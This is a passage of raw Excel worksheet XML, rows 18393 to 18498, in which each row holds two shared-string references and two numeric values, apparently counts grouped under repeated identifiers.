        <v>16224</v>
      </c>
      <c r="B18393" t="s">
        <v>16224</v>
      </c>
      <c r="C18393">
        <v>1</v>
      </c>
      <c r="D18393">
        <v>1771</v>
      </c>
    </row>
    <row r="18394" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18394" t="s">
        <v>16228</v>
      </c>
      <c r="B18394" t="s">
        <v>16215</v>
      </c>
      <c r="C18394">
        <v>0</v>
      </c>
      <c r="D18394">
        <v>1598</v>
      </c>
    </row>
    <row r="18395" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18395" t="s">
        <v>16231</v>
      </c>
      <c r="B18395" t="s">
        <v>16216</v>
      </c>
      <c r="C18395">
        <v>0</v>
      </c>
      <c r="D18395">
        <v>1598</v>
      </c>
    </row>
    <row r="18396" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18396" t="s">
        <v>16228</v>
      </c>
      <c r="B18396" t="s">
        <v>16217</v>
      </c>
      <c r="C18396">
        <v>0</v>
      </c>
      <c r="D18396">
        <v>1598</v>
      </c>
    </row>
    <row r="18397" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18397" t="s">
        <v>16231</v>
      </c>
      <c r="B18397" t="s">
        <v>16218</v>
      </c>
      <c r="C18397">
        <v>0</v>
      </c>
      <c r="D18397">
        <v>1598</v>
      </c>
    </row>
    <row r="18398" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18398" t="s">
        <v>16229</v>
      </c>
      <c r="B18398" t="s">
        <v>16219</v>
      </c>
      <c r="C18398">
        <v>2</v>
      </c>
      <c r="D18398">
        <v>1598</v>
      </c>
    </row>
    <row r="18399" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18399" t="s">
        <v>16230</v>
      </c>
      <c r="B18399" t="s">
        <v>16220</v>
      </c>
      <c r="C18399">
        <v>6</v>
      </c>
      <c r="D18399">
        <v>1598</v>
      </c>
    </row>
    <row r="18400" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18400" t="s">
        <v>16229</v>
      </c>
      <c r="B18400" t="s">
        <v>16221</v>
      </c>
      <c r="C18400">
        <v>15</v>
      </c>
      <c r="D18400">
        <v>1598</v>
      </c>
    </row>
    <row r="18401" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18401" t="s">
        <v>16230</v>
      </c>
      <c r="B18401" t="s">
        <v>16222</v>
      </c>
      <c r="C18401">
        <v>62</v>
      </c>
      <c r="D18401">
        <v>1598</v>
      </c>
    </row>
    <row r="18402" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18402" t="s">
        <v>16228</v>
      </c>
      <c r="B18402" t="s">
        <v>16211</v>
      </c>
      <c r="C18402">
        <v>0</v>
      </c>
      <c r="D18402">
        <v>1667</v>
      </c>
    </row>
    <row r="18403" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18403" t="s">
        <v>16231</v>
      </c>
      <c r="B18403" t="s">
        <v>16212</v>
      </c>
      <c r="C18403">
        <v>0</v>
      </c>
      <c r="D18403">
        <v>1667</v>
      </c>
    </row>
    <row r="18404" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18404" t="s">
        <v>16228</v>
      </c>
      <c r="B18404" t="s">
        <v>16213</v>
      </c>
      <c r="C18404">
        <v>0</v>
      </c>
      <c r="D18404">
        <v>1667</v>
      </c>
    </row>
    <row r="18405" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18405" t="s">
        <v>16231</v>
      </c>
      <c r="B18405" t="s">
        <v>16214</v>
      </c>
      <c r="C18405">
        <v>0</v>
      </c>
      <c r="D18405">
        <v>1667</v>
      </c>
    </row>
    <row r="18406" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18406" t="s">
        <v>16228</v>
      </c>
      <c r="B18406" t="s">
        <v>16215</v>
      </c>
      <c r="C18406">
        <v>0</v>
      </c>
      <c r="D18406">
        <v>1667</v>
      </c>
    </row>
    <row r="18407" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18407" t="s">
        <v>16231</v>
      </c>
      <c r="B18407" t="s">
        <v>16216</v>
      </c>
      <c r="C18407">
        <v>4</v>
      </c>
      <c r="D18407">
        <v>1667</v>
      </c>
    </row>
    <row r="18408" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18408" t="s">
        <v>16228</v>
      </c>
      <c r="B18408" t="s">
        <v>16217</v>
      </c>
      <c r="C18408">
        <v>10</v>
      </c>
      <c r="D18408">
        <v>1667</v>
      </c>
    </row>
    <row r="18409" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18409" t="s">
        <v>16231</v>
      </c>
      <c r="B18409" t="s">
        <v>16218</v>
      </c>
      <c r="C18409">
        <v>6</v>
      </c>
      <c r="D18409">
        <v>1667</v>
      </c>
    </row>
    <row r="18410" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18410" t="s">
        <v>16229</v>
      </c>
      <c r="B18410" t="s">
        <v>16219</v>
      </c>
      <c r="C18410">
        <v>0</v>
      </c>
      <c r="D18410">
        <v>1667</v>
      </c>
    </row>
    <row r="18411" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18411" t="s">
        <v>16230</v>
      </c>
      <c r="B18411" t="s">
        <v>16220</v>
      </c>
      <c r="C18411">
        <v>0</v>
      </c>
      <c r="D18411">
        <v>1667</v>
      </c>
    </row>
    <row r="18412" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18412" t="s">
        <v>16229</v>
      </c>
      <c r="B18412" t="s">
        <v>16221</v>
      </c>
      <c r="C18412">
        <v>40</v>
      </c>
      <c r="D18412">
        <v>1667</v>
      </c>
    </row>
    <row r="18413" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18413" t="s">
        <v>16230</v>
      </c>
      <c r="B18413" t="s">
        <v>16222</v>
      </c>
      <c r="C18413">
        <v>250</v>
      </c>
      <c r="D18413">
        <v>1667</v>
      </c>
    </row>
    <row r="18414" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18414" t="s">
        <v>16223</v>
      </c>
      <c r="B18414" t="s">
        <v>16223</v>
      </c>
      <c r="C18414">
        <v>0</v>
      </c>
      <c r="D18414">
        <v>1667</v>
      </c>
    </row>
    <row r="18415" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18415" t="s">
        <v>16224</v>
      </c>
      <c r="B18415" t="s">
        <v>16224</v>
      </c>
      <c r="C18415">
        <v>0</v>
      </c>
      <c r="D18415">
        <v>1667</v>
      </c>
    </row>
    <row r="18416" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18416" t="s">
        <v>16228</v>
      </c>
      <c r="B18416" t="s">
        <v>16211</v>
      </c>
      <c r="C18416">
        <v>0</v>
      </c>
      <c r="D18416">
        <v>5527</v>
      </c>
    </row>
    <row r="18417" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18417" t="s">
        <v>16231</v>
      </c>
      <c r="B18417" t="s">
        <v>16212</v>
      </c>
      <c r="C18417">
        <v>0</v>
      </c>
      <c r="D18417">
        <v>5527</v>
      </c>
    </row>
    <row r="18418" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18418" t="s">
        <v>16228</v>
      </c>
      <c r="B18418" t="s">
        <v>16213</v>
      </c>
      <c r="C18418">
        <v>0</v>
      </c>
      <c r="D18418">
        <v>5527</v>
      </c>
    </row>
    <row r="18419" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18419" t="s">
        <v>16231</v>
      </c>
      <c r="B18419" t="s">
        <v>16214</v>
      </c>
      <c r="C18419">
        <v>0</v>
      </c>
      <c r="D18419">
        <v>5527</v>
      </c>
    </row>
    <row r="18420" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18420" t="s">
        <v>16228</v>
      </c>
      <c r="B18420" t="s">
        <v>16215</v>
      </c>
      <c r="C18420">
        <v>1</v>
      </c>
      <c r="D18420">
        <v>5527</v>
      </c>
    </row>
    <row r="18421" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18421" t="s">
        <v>16231</v>
      </c>
      <c r="B18421" t="s">
        <v>16216</v>
      </c>
      <c r="C18421">
        <v>3</v>
      </c>
      <c r="D18421">
        <v>5527</v>
      </c>
    </row>
    <row r="18422" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18422" t="s">
        <v>16228</v>
      </c>
      <c r="B18422" t="s">
        <v>16217</v>
      </c>
      <c r="C18422">
        <v>1</v>
      </c>
      <c r="D18422">
        <v>5527</v>
      </c>
    </row>
    <row r="18423" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18423" t="s">
        <v>16231</v>
      </c>
      <c r="B18423" t="s">
        <v>16218</v>
      </c>
      <c r="C18423">
        <v>1</v>
      </c>
      <c r="D18423">
        <v>5527</v>
      </c>
    </row>
    <row r="18424" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18424" t="s">
        <v>16229</v>
      </c>
      <c r="B18424" t="s">
        <v>16219</v>
      </c>
      <c r="C18424">
        <v>1</v>
      </c>
      <c r="D18424">
        <v>5527</v>
      </c>
    </row>
    <row r="18425" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18425" t="s">
        <v>16230</v>
      </c>
      <c r="B18425" t="s">
        <v>16220</v>
      </c>
      <c r="C18425">
        <v>3</v>
      </c>
      <c r="D18425">
        <v>5527</v>
      </c>
    </row>
    <row r="18426" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18426" t="s">
        <v>16229</v>
      </c>
      <c r="B18426" t="s">
        <v>16221</v>
      </c>
      <c r="C18426">
        <v>0</v>
      </c>
      <c r="D18426">
        <v>5527</v>
      </c>
    </row>
    <row r="18427" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18427" t="s">
        <v>16230</v>
      </c>
      <c r="B18427" t="s">
        <v>16222</v>
      </c>
      <c r="C18427">
        <v>0</v>
      </c>
      <c r="D18427">
        <v>5527</v>
      </c>
    </row>
    <row r="18428" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18428" t="s">
        <v>16223</v>
      </c>
      <c r="B18428" t="s">
        <v>16223</v>
      </c>
      <c r="C18428">
        <v>5</v>
      </c>
      <c r="D18428">
        <v>5527</v>
      </c>
    </row>
    <row r="18429" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18429" t="s">
        <v>16224</v>
      </c>
      <c r="B18429" t="s">
        <v>16224</v>
      </c>
      <c r="C18429">
        <v>0</v>
      </c>
      <c r="D18429">
        <v>5527</v>
      </c>
    </row>
    <row r="18430" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18430" t="s">
        <v>16228</v>
      </c>
      <c r="B18430" t="s">
        <v>16211</v>
      </c>
      <c r="C18430">
        <v>0</v>
      </c>
      <c r="D18430">
        <v>5479</v>
      </c>
    </row>
    <row r="18431" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18431" t="s">
        <v>16231</v>
      </c>
      <c r="B18431" t="s">
        <v>16212</v>
      </c>
      <c r="C18431">
        <v>0</v>
      </c>
      <c r="D18431">
        <v>5479</v>
      </c>
    </row>
    <row r="18432" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18432" t="s">
        <v>16228</v>
      </c>
      <c r="B18432" t="s">
        <v>16213</v>
      </c>
      <c r="C18432">
        <v>0</v>
      </c>
      <c r="D18432">
        <v>5479</v>
      </c>
    </row>
    <row r="18433" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18433" t="s">
        <v>16231</v>
      </c>
      <c r="B18433" t="s">
        <v>16214</v>
      </c>
      <c r="C18433">
        <v>0</v>
      </c>
      <c r="D18433">
        <v>5479</v>
      </c>
    </row>
    <row r="18434" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18434" t="s">
        <v>16228</v>
      </c>
      <c r="B18434" t="s">
        <v>16215</v>
      </c>
      <c r="C18434">
        <v>0</v>
      </c>
      <c r="D18434">
        <v>5479</v>
      </c>
    </row>
    <row r="18435" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18435" t="s">
        <v>16231</v>
      </c>
      <c r="B18435" t="s">
        <v>16216</v>
      </c>
      <c r="C18435">
        <v>2</v>
      </c>
      <c r="D18435">
        <v>5479</v>
      </c>
    </row>
    <row r="18436" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18436" t="s">
        <v>16228</v>
      </c>
      <c r="B18436" t="s">
        <v>16217</v>
      </c>
      <c r="C18436">
        <v>25</v>
      </c>
      <c r="D18436">
        <v>5479</v>
      </c>
    </row>
    <row r="18437" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18437" t="s">
        <v>16231</v>
      </c>
      <c r="B18437" t="s">
        <v>16218</v>
      </c>
      <c r="C18437">
        <v>11</v>
      </c>
      <c r="D18437">
        <v>5479</v>
      </c>
    </row>
    <row r="18438" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18438" t="s">
        <v>16229</v>
      </c>
      <c r="B18438" t="s">
        <v>16219</v>
      </c>
      <c r="C18438">
        <v>0</v>
      </c>
      <c r="D18438">
        <v>5479</v>
      </c>
    </row>
    <row r="18439" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18439" t="s">
        <v>16230</v>
      </c>
      <c r="B18439" t="s">
        <v>16220</v>
      </c>
      <c r="C18439">
        <v>0</v>
      </c>
      <c r="D18439">
        <v>5479</v>
      </c>
    </row>
    <row r="18440" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18440" t="s">
        <v>16229</v>
      </c>
      <c r="B18440" t="s">
        <v>16221</v>
      </c>
      <c r="C18440">
        <v>22</v>
      </c>
      <c r="D18440">
        <v>5479</v>
      </c>
    </row>
    <row r="18441" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18441" t="s">
        <v>16230</v>
      </c>
      <c r="B18441" t="s">
        <v>16222</v>
      </c>
      <c r="C18441">
        <v>60</v>
      </c>
      <c r="D18441">
        <v>5479</v>
      </c>
    </row>
    <row r="18442" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18442" t="s">
        <v>16223</v>
      </c>
      <c r="B18442" t="s">
        <v>16223</v>
      </c>
      <c r="C18442">
        <v>21</v>
      </c>
      <c r="D18442">
        <v>5479</v>
      </c>
    </row>
    <row r="18443" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18443" t="s">
        <v>16224</v>
      </c>
      <c r="B18443" t="s">
        <v>16224</v>
      </c>
      <c r="C18443">
        <v>1</v>
      </c>
      <c r="D18443">
        <v>5479</v>
      </c>
    </row>
    <row r="18444" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18444" t="s">
        <v>16231</v>
      </c>
      <c r="B18444" t="s">
        <v>16216</v>
      </c>
      <c r="C18444">
        <v>1</v>
      </c>
      <c r="D18444">
        <v>88</v>
      </c>
    </row>
    <row r="18445" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18445" t="s">
        <v>16230</v>
      </c>
      <c r="B18445" t="s">
        <v>16222</v>
      </c>
      <c r="C18445">
        <v>115</v>
      </c>
      <c r="D18445">
        <v>88</v>
      </c>
    </row>
    <row r="18446" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18446" t="s">
        <v>16228</v>
      </c>
      <c r="B18446" t="s">
        <v>16211</v>
      </c>
      <c r="C18446">
        <v>0</v>
      </c>
      <c r="D18446">
        <v>5535</v>
      </c>
    </row>
    <row r="18447" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18447" t="s">
        <v>16231</v>
      </c>
      <c r="B18447" t="s">
        <v>16212</v>
      </c>
      <c r="C18447">
        <v>0</v>
      </c>
      <c r="D18447">
        <v>5535</v>
      </c>
    </row>
    <row r="18448" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18448" t="s">
        <v>16228</v>
      </c>
      <c r="B18448" t="s">
        <v>16213</v>
      </c>
      <c r="C18448">
        <v>0</v>
      </c>
      <c r="D18448">
        <v>5535</v>
      </c>
    </row>
    <row r="18449" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18449" t="s">
        <v>16231</v>
      </c>
      <c r="B18449" t="s">
        <v>16214</v>
      </c>
      <c r="C18449">
        <v>0</v>
      </c>
      <c r="D18449">
        <v>5535</v>
      </c>
    </row>
    <row r="18450" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18450" t="s">
        <v>16228</v>
      </c>
      <c r="B18450" t="s">
        <v>16215</v>
      </c>
      <c r="C18450">
        <v>5</v>
      </c>
      <c r="D18450">
        <v>5535</v>
      </c>
    </row>
    <row r="18451" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18451" t="s">
        <v>16231</v>
      </c>
      <c r="B18451" t="s">
        <v>16216</v>
      </c>
      <c r="C18451">
        <v>4</v>
      </c>
      <c r="D18451">
        <v>5535</v>
      </c>
    </row>
    <row r="18452" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18452" t="s">
        <v>16228</v>
      </c>
      <c r="B18452" t="s">
        <v>16217</v>
      </c>
      <c r="C18452">
        <v>15</v>
      </c>
      <c r="D18452">
        <v>5535</v>
      </c>
    </row>
    <row r="18453" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18453" t="s">
        <v>16231</v>
      </c>
      <c r="B18453" t="s">
        <v>16218</v>
      </c>
      <c r="C18453">
        <v>0</v>
      </c>
      <c r="D18453">
        <v>5535</v>
      </c>
    </row>
    <row r="18454" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18454" t="s">
        <v>16229</v>
      </c>
      <c r="B18454" t="s">
        <v>16219</v>
      </c>
      <c r="C18454">
        <v>0</v>
      </c>
      <c r="D18454">
        <v>5535</v>
      </c>
    </row>
    <row r="18455" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18455" t="s">
        <v>16230</v>
      </c>
      <c r="B18455" t="s">
        <v>16220</v>
      </c>
      <c r="C18455">
        <v>0</v>
      </c>
      <c r="D18455">
        <v>5535</v>
      </c>
    </row>
    <row r="18456" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18456" t="s">
        <v>16229</v>
      </c>
      <c r="B18456" t="s">
        <v>16221</v>
      </c>
      <c r="C18456">
        <v>0</v>
      </c>
      <c r="D18456">
        <v>5535</v>
      </c>
    </row>
    <row r="18457" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18457" t="s">
        <v>16230</v>
      </c>
      <c r="B18457" t="s">
        <v>16222</v>
      </c>
      <c r="C18457">
        <v>0</v>
      </c>
      <c r="D18457">
        <v>5535</v>
      </c>
    </row>
    <row r="18458" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18458" t="s">
        <v>16223</v>
      </c>
      <c r="B18458" t="s">
        <v>16223</v>
      </c>
      <c r="C18458">
        <v>24</v>
      </c>
      <c r="D18458">
        <v>5535</v>
      </c>
    </row>
    <row r="18459" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18459" t="s">
        <v>16224</v>
      </c>
      <c r="B18459" t="s">
        <v>16224</v>
      </c>
      <c r="C18459">
        <v>1</v>
      </c>
      <c r="D18459">
        <v>5535</v>
      </c>
    </row>
    <row r="18460" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18460" t="s">
        <v>16228</v>
      </c>
      <c r="B18460" t="s">
        <v>16211</v>
      </c>
      <c r="C18460">
        <v>0</v>
      </c>
      <c r="D18460">
        <v>5492</v>
      </c>
    </row>
    <row r="18461" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18461" t="s">
        <v>16231</v>
      </c>
      <c r="B18461" t="s">
        <v>16212</v>
      </c>
      <c r="C18461">
        <v>0</v>
      </c>
      <c r="D18461">
        <v>5492</v>
      </c>
    </row>
    <row r="18462" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18462" t="s">
        <v>16228</v>
      </c>
      <c r="B18462" t="s">
        <v>16213</v>
      </c>
      <c r="C18462">
        <v>0</v>
      </c>
      <c r="D18462">
        <v>5492</v>
      </c>
    </row>
    <row r="18463" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18463" t="s">
        <v>16231</v>
      </c>
      <c r="B18463" t="s">
        <v>16214</v>
      </c>
      <c r="C18463">
        <v>0</v>
      </c>
      <c r="D18463">
        <v>5492</v>
      </c>
    </row>
    <row r="18464" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18464" t="s">
        <v>16228</v>
      </c>
      <c r="B18464" t="s">
        <v>16215</v>
      </c>
      <c r="C18464">
        <v>1</v>
      </c>
      <c r="D18464">
        <v>5492</v>
      </c>
    </row>
    <row r="18465" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18465" t="s">
        <v>16231</v>
      </c>
      <c r="B18465" t="s">
        <v>16216</v>
      </c>
      <c r="C18465">
        <v>0</v>
      </c>
      <c r="D18465">
        <v>5492</v>
      </c>
    </row>
    <row r="18466" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18466" t="s">
        <v>16228</v>
      </c>
      <c r="B18466" t="s">
        <v>16217</v>
      </c>
      <c r="C18466">
        <v>4</v>
      </c>
      <c r="D18466">
        <v>5492</v>
      </c>
    </row>
    <row r="18467" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18467" t="s">
        <v>16231</v>
      </c>
      <c r="B18467" t="s">
        <v>16218</v>
      </c>
      <c r="C18467">
        <v>0</v>
      </c>
      <c r="D18467">
        <v>5492</v>
      </c>
    </row>
    <row r="18468" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18468" t="s">
        <v>16229</v>
      </c>
      <c r="B18468" t="s">
        <v>16219</v>
      </c>
      <c r="C18468">
        <v>0</v>
      </c>
      <c r="D18468">
        <v>5492</v>
      </c>
    </row>
    <row r="18469" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18469" t="s">
        <v>16230</v>
      </c>
      <c r="B18469" t="s">
        <v>16220</v>
      </c>
      <c r="C18469">
        <v>0</v>
      </c>
      <c r="D18469">
        <v>5492</v>
      </c>
    </row>
    <row r="18470" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18470" t="s">
        <v>16229</v>
      </c>
      <c r="B18470" t="s">
        <v>16221</v>
      </c>
      <c r="C18470">
        <v>0</v>
      </c>
      <c r="D18470">
        <v>5492</v>
      </c>
    </row>
    <row r="18471" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18471" t="s">
        <v>16230</v>
      </c>
      <c r="B18471" t="s">
        <v>16222</v>
      </c>
      <c r="C18471">
        <v>0</v>
      </c>
      <c r="D18471">
        <v>5492</v>
      </c>
    </row>
    <row r="18472" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18472" t="s">
        <v>16223</v>
      </c>
      <c r="B18472" t="s">
        <v>16223</v>
      </c>
      <c r="C18472">
        <v>30</v>
      </c>
      <c r="D18472">
        <v>5492</v>
      </c>
    </row>
    <row r="18473" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18473" t="s">
        <v>16224</v>
      </c>
      <c r="B18473" t="s">
        <v>16224</v>
      </c>
      <c r="C18473">
        <v>1</v>
      </c>
      <c r="D18473">
        <v>5492</v>
      </c>
    </row>
    <row r="18474" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18474" t="s">
        <v>16228</v>
      </c>
      <c r="B18474" t="s">
        <v>16215</v>
      </c>
      <c r="C18474">
        <v>4</v>
      </c>
      <c r="D18474">
        <v>1177</v>
      </c>
    </row>
    <row r="18475" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18475" t="s">
        <v>16228</v>
      </c>
      <c r="B18475" t="s">
        <v>16217</v>
      </c>
      <c r="C18475">
        <v>1</v>
      </c>
      <c r="D18475">
        <v>1177</v>
      </c>
    </row>
    <row r="18476" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18476" t="s">
        <v>16228</v>
      </c>
      <c r="B18476" t="s">
        <v>16211</v>
      </c>
      <c r="C18476">
        <v>0</v>
      </c>
      <c r="D18476">
        <v>5457</v>
      </c>
    </row>
    <row r="18477" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18477" t="s">
        <v>16231</v>
      </c>
      <c r="B18477" t="s">
        <v>16212</v>
      </c>
      <c r="C18477">
        <v>0</v>
      </c>
      <c r="D18477">
        <v>5457</v>
      </c>
    </row>
    <row r="18478" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18478" t="s">
        <v>16228</v>
      </c>
      <c r="B18478" t="s">
        <v>16213</v>
      </c>
      <c r="C18478">
        <v>0</v>
      </c>
      <c r="D18478">
        <v>5457</v>
      </c>
    </row>
    <row r="18479" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18479" t="s">
        <v>16231</v>
      </c>
      <c r="B18479" t="s">
        <v>16214</v>
      </c>
      <c r="C18479">
        <v>0</v>
      </c>
      <c r="D18479">
        <v>5457</v>
      </c>
    </row>
    <row r="18480" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18480" t="s">
        <v>16228</v>
      </c>
      <c r="B18480" t="s">
        <v>16215</v>
      </c>
      <c r="C18480">
        <v>1</v>
      </c>
      <c r="D18480">
        <v>5457</v>
      </c>
    </row>
    <row r="18481" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18481" t="s">
        <v>16231</v>
      </c>
      <c r="B18481" t="s">
        <v>16216</v>
      </c>
      <c r="C18481">
        <v>1</v>
      </c>
      <c r="D18481">
        <v>5457</v>
      </c>
    </row>
    <row r="18482" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18482" t="s">
        <v>16228</v>
      </c>
      <c r="B18482" t="s">
        <v>16217</v>
      </c>
      <c r="C18482">
        <v>0</v>
      </c>
      <c r="D18482">
        <v>5457</v>
      </c>
    </row>
    <row r="18483" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18483" t="s">
        <v>16231</v>
      </c>
      <c r="B18483" t="s">
        <v>16218</v>
      </c>
      <c r="C18483">
        <v>10</v>
      </c>
      <c r="D18483">
        <v>5457</v>
      </c>
    </row>
    <row r="18484" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18484" t="s">
        <v>16229</v>
      </c>
      <c r="B18484" t="s">
        <v>16219</v>
      </c>
      <c r="C18484">
        <v>0</v>
      </c>
      <c r="D18484">
        <v>5457</v>
      </c>
    </row>
    <row r="18485" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18485" t="s">
        <v>16230</v>
      </c>
      <c r="B18485" t="s">
        <v>16220</v>
      </c>
      <c r="C18485">
        <v>0</v>
      </c>
      <c r="D18485">
        <v>5457</v>
      </c>
    </row>
    <row r="18486" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18486" t="s">
        <v>16229</v>
      </c>
      <c r="B18486" t="s">
        <v>16221</v>
      </c>
      <c r="C18486">
        <v>0</v>
      </c>
      <c r="D18486">
        <v>5457</v>
      </c>
    </row>
    <row r="18487" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18487" t="s">
        <v>16230</v>
      </c>
      <c r="B18487" t="s">
        <v>16222</v>
      </c>
      <c r="C18487">
        <v>0</v>
      </c>
      <c r="D18487">
        <v>5457</v>
      </c>
    </row>
    <row r="18488" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18488" t="s">
        <v>16223</v>
      </c>
      <c r="B18488" t="s">
        <v>16223</v>
      </c>
      <c r="C18488">
        <v>6</v>
      </c>
      <c r="D18488">
        <v>5457</v>
      </c>
    </row>
    <row r="18489" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18489" t="s">
        <v>16224</v>
      </c>
      <c r="B18489" t="s">
        <v>16224</v>
      </c>
      <c r="C18489">
        <v>1</v>
      </c>
      <c r="D18489">
        <v>5457</v>
      </c>
    </row>
    <row r="18490" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18490" t="s">
        <v>16223</v>
      </c>
      <c r="B18490" t="s">
        <v>16223</v>
      </c>
      <c r="C18490">
        <v>24</v>
      </c>
      <c r="D18490">
        <v>5457</v>
      </c>
    </row>
    <row r="18491" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18491" t="s">
        <v>16228</v>
      </c>
      <c r="B18491" t="s">
        <v>16211</v>
      </c>
      <c r="C18491">
        <v>0</v>
      </c>
      <c r="D18491">
        <v>316</v>
      </c>
    </row>
    <row r="18492" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18492" t="s">
        <v>16231</v>
      </c>
      <c r="B18492" t="s">
        <v>16212</v>
      </c>
      <c r="C18492">
        <v>0</v>
      </c>
      <c r="D18492">
        <v>316</v>
      </c>
    </row>
    <row r="18493" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18493" t="s">
        <v>16228</v>
      </c>
      <c r="B18493" t="s">
        <v>16213</v>
      </c>
      <c r="C18493">
        <v>0</v>
      </c>
      <c r="D18493">
        <v>316</v>
      </c>
    </row>
    <row r="18494" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18494" t="s">
        <v>16231</v>
      </c>
      <c r="B18494" t="s">
        <v>16214</v>
      </c>
      <c r="C18494">
        <v>0</v>
      </c>
      <c r="D18494">
        <v>316</v>
      </c>
    </row>
    <row r="18495" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18495" t="s">
        <v>16228</v>
      </c>
      <c r="B18495" t="s">
        <v>16215</v>
      </c>
      <c r="C18495">
        <v>0</v>
      </c>
      <c r="D18495">
        <v>316</v>
      </c>
    </row>
    <row r="18496" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18496" t="s">
        <v>16231</v>
      </c>
      <c r="B18496" t="s">
        <v>16216</v>
      </c>
      <c r="C18496">
        <v>8</v>
      </c>
      <c r="D18496">
        <v>316</v>
      </c>
    </row>
    <row r="18497" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18497" t="s">
        <v>16228</v>
      </c>
      <c r="B18497" t="s">
        <v>16217</v>
      </c>
      <c r="C18497">
        <v>16</v>
      </c>
      <c r="D18497">
        <v>316</v>
      </c>
    </row>
    <row r="18498" spans="1:4" x14ac:dyDescent="0.2">
